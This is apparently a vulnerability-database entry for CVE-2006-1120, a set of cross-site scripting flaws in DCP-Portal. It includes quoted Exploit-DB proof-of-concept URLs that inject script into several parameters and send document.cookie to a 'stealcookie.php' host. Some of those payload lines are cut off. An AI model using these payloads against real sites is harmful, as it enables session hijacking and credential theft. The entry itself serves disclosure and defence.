CVE-2006-1120
Published 2006-03-09
Priority: P4 17
Severity: low, 2.6 (CVSS 2.0)
Vector: AV:N/AC:H/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 2.93% (85.3th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 6.1.1 and earlier, with register_globals enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) its_url parameter in the documents page and (2) url parameter in the send_write page of (a) index.php; (3) subject, and (4) images parameters to (b) calendar.php; (5) bid, (6) replying_msg, (7) subject, (8) body, and (9) mid parameters to (c) forums.php; (10) subject and (11) message parameters to (d) inbox.php; (12) subject_color and (13) email parameters to (e) lostpassword.php; and the (14) c_name, (15) content_inicial, and (16) cid parameters to (f) mycontents.php. NOTE: the calendar.php/day vector is already subsumed by CVE-2006-0220, and the calendar.php/month, calendar.php/year, and search.php/q parameters for calendar.php are already subsumed by CVE-2004-2511.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeworx_technologies | dcp-portal | — | — |
No detection rules found.
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/dcp-portal611/lostpassword.php?subject_color=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/lostpassword.php?email=">document.location
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
http://www.example.com/dcp-portal611/calendar.php?subject_color=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/calendar.php?images=">document.location="http://ww
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/mycontents.php?action=content&content_
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
document.
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
http://www.example.com/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/index.php?page=send_write&url=xy
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
---
source: https://www.securityfocus.com/bid/17050/info
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
http://www.example.com/dcp-portal611/forums.php?action=board&bid=">document.location="http://www.example.com/stealcookie
No writeups or analysis indexed.
http://securityreason.com/securityalert/392
http://www.osvdb.org/23976
http://www.osvdb.org/23977
http://www.osvdb.org/23978
http://www.osvdb.org/23979
http://www.osvdb.org/23980
http://www.osvdb.org/23981
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt
http://www.securityfocus.com/archive/1/427175/100/0/threaded
http://www.securityfocus.com/bid/17050
https://exchange.xforce.ibmcloud.com/vulnerabilities/25279